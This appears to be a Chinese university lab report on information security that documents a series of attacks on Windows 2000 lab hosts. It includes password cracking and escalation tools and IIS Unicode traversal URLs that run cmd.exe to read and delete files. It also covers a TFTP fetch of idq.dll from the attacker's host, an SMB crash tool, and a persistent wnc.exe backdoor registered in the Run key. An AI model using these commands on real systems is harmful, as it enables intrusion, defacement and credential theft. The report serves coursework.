中南大学信息安全工程实验报告文档格式.docx
- 文档编号:13163288
- 上传时间:2022-10-07
- 格式:DOCX
- 页数:42
- 大小:1.15MB
中南大学信息安全工程实验报告文档格式.docx
《中南大学信息安全工程实验报告文档格式.docx》由会员分享,可在线阅读,更多相关《中南大学信息安全工程实验报告文档格式.docx(42页珍藏版)》请在冰豆网上搜索。
实验四 13
实验六 18
实验七 24
实验八 29
总结 35
实验一
一配置VM虚拟机
1、先查看主机的ip地址为10.96.26.205
2、将虚拟机的ip地址设置成和主机同一网段的
3、在主机对虚拟机ping测试两者是否连通
经测试两者连通
4、打开wireshark,设置过滤项
源ip和目的ip:
ip.dst==10.96.94.25&
&
ip.src==10.96.80.155
设置只抓tcp下的ftp和telnet协议:
tcp.port==21||tcp.port==23
抓取udp和icmp:
udp||icmp
先ping虚拟机,然后开始抓包,ping完后,停止抓包,抓包数据如下
二开启telnet服务
1、分别在主机和虚拟机上开启telnet服务
主机的telnet在服务选项开启
在主机的DOS窗口下Telnet虚拟机
192.168.31.128为虚拟机的地址
2、输入服务器的用户名和密码,显示telnet虚拟机成功
实验二
一、系统用户的扫描
1、对ip地址为169.254.168.201的计算机进行扫描
2、得到对方机器的用户列表
可选择一个用户对其进行字典测试或穷举测试,字典测试需选择一个字典文本,穷举测试可以设置穷举所包含的内容。
选择administrator进行字典测试,得到密码为111
二、端口扫描
使用工具Portscan
对ip地址为10.96.94.25的主机进行扫描,得到目标主机的所有开放端口
三、共享目录扫描
通过工具软件Shed来扫描对方主机,得到对方计算机提供了哪些目录共享。
在这里起始ip和目标ip都添目标主机ip
点击可共享文件夹客队目标主机内的文件进行操作
四、利用tcp协议进行端口扫描
实现端口扫描的程序可以使用TCP协议和UDP协议,原理是利用Socket连接对方的计算机的某端口,试图和该端口建立连接,如果建立成功,就说明对方开放了该端口,如果失败了,就说明对方没有开放该端口,以下为探测ip为10.96.78.201的23号端口是否开放的结果
实验三
一漏洞扫描
1、使用xscan对windows2000进行扫描,设置扫描参数及模块,扫描ip为10.96.44.230的主机
2、开始进行漏洞扫描
二网络监听
使用winsniffer可截取局域网内的密码,由于我的电脑不能运行winsniffer,下面我们来了解一下基本使用方法
1、点击工具栏Adapter,设置为本机的物理网卡
2、使用dos命令进行远程FTP服务
3、winsniffer已经记录下了刚才会话记录
三得到管理员密码
环境:
windows2000
所有的用户信息都存储在系统的一个进程中,这个进程是:
“winlogon.exe”,可以利用程序将当前登录用户的密码解码出来,将FindPass.exe拷贝到C盘根目录,在DOS界面下执行该程序,将得到当前用户得登录名
四普通用户建立管理员账号
windows2000
利用工具GetAdmin.exe可以在用普通用户帐号登录后,将自己加到管理员组或者新建一个具有管理员权限的用户。
执行程序GetAdmin.exe,程序自动读取所有用户列表,点击按钮“New”,输入要新建的管理员组的用户名“IAMHacker”,点击按钮“确定”以后,然后点击主窗口的按钮“OK”,添加成功。
实验四
一office文档暴力破解
1、设置word权限密码
在工具——选项——安全性中设置密码为999
保存并关闭该文档,然后打开,就需要输入密码
2、使用工具软件AdvancedOfficeXPPasswordRecovery可以快速破解Word文档密码,点击工具栏按钮“OpenFile”,打开刚才建立的Word文档,程序打开成功后会在LogWindow中显示成功打开的消息
二利用Unicode漏洞对对方主机进行操作
1、使用X-Scan对目标主机10.96.44.230进行IIS扫描,Unicode漏洞属于IIS漏洞
可以看出,存在许多系统的漏洞。
只要是/scripts开头的漏洞都是Unicode漏洞。
2、在浏览器中输入
http:
//10.96.44.230/scripts/..%c0%2f../winnt/system32/cmd.exe?
/c+dir+c:
\
有Unicode的主机ip%c0%2f”就是“/”的Unicode编码
这条语句是执行dir命令列出目录结构。
结果可以看到ip地址为10.96.44.230下的目录结构
3、用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件。
http:
/c+type+c:
\boot.ini
4、更改对方主页,已经知道对方网站的根路径在“C:
\Initpub\wwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”(IIS默认启动页面)来删除主页http:
/c+del+c:
\inetpub\wwwroot\default.asp
5、将cmd.exe文件拷贝到scripts目录,并改名为c.exe
/c+copy+C:
\winnt\system32\cmd.exe+c.exe
以后使用cmd.exe命令就方便了,比如查看C盘的目录,使用的语句就可以简化为:
//10.96.44.230/scripts/c.exe?
实验五
一利用Unicode漏洞入侵系统
1、使用工具软件tftpd32.exe建立服务器。
将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程序
2、这样在本地的TFTP的服务器就建立好了,保留这个窗口,通过该服务器向对方传递idq.dll文件。
在浏览器中执行命令:
/c+tftp+-i+10.96.78.200+get+idq.dll
传送成功
3、下面使用工具软件ispc.exe入侵对方系统。
拷贝ispc.exe文件到本地计算机的C盘根目录,在DOS命令行下执行命令:
ispc.exe10.96.44.230/scripts/idq.dll
连接成功后就直接进入了对方的DOS命令行下,而且具有管理员权限
但是这一步存在问题,说它没有idq.dll,不知道是什么问题
二其他漏洞攻击
1、打印漏洞:
利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。
使用工具软件cniis.exe对ip地址为10.96.44.230的主机进行操作
cniis10.96.44.2300
0表示该操作系统未打补丁
2、SMB致命攻击
SMB(SessionMessageBlock,会话消息块协议)又叫做NetBIOS或LanManager协议,用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。
利用该协议可以进行各方面的攻击,比如可以抓取其他用户访问自己计算机共享目录的SMB会话包,然后利用SMB会话包登录对方的计算机。
下面介绍利用SMBdie让对方操作系统系统重新启动或者蓝屏。
(1)攻击时输入对方的IP和对方的计算机名
(2)点击kill,对方计算机会蓝屏或重启
实验六
一远程启动Telnet服务
二记录管理员口令修改过程
首先在对方操作系统中执行Win2KPass.exe文件,当对方主机管理员密码修改并重启计算机以后,就在Winnt\temp目录下产生一个ini文件。
该程序执行完后会自己删除自己。
三建立Web服务和Telnet服务
1、使用工具软件wnc.exe开启两个服务Web服务和Telnet服务。
在对方的命令行下执行wnc.exe,执行完毕后,利用命令“netstat-an”来查看开启的808(Web服务)和707(Telnet服务)端口
2、测试Web服务
在浏览器地址栏中输入“http:
//10.96.44.230:
808”,出现主机的盘符列表
3、利用“telnet10.96.44.230707”命令,不用任何的用户名和密码就可以登录对方主机
4、将wnc.exe加到自启动列表
(1)在dos下执行reg.exeaddHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/vservice/dwnc.exe
(2)查看一下对方的注册表的自启动项,已经被修改
四让禁用的Guest具有管理权限
直接使用“regedit”命令打开注册表,该键值是隐藏的。
可以利用工具软件psu.exe得到该键值的查看和编辑权
1、使用进程管理器查看winlogon的PID为196,执行命令“psu-pregedit-ipid”其中pid为Winlogon.exe的进程号
2、执行完命令以后,自动打开了注册表编辑器,查看SAM下的键值
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 中南 大学 信息 安全工程 实验 报告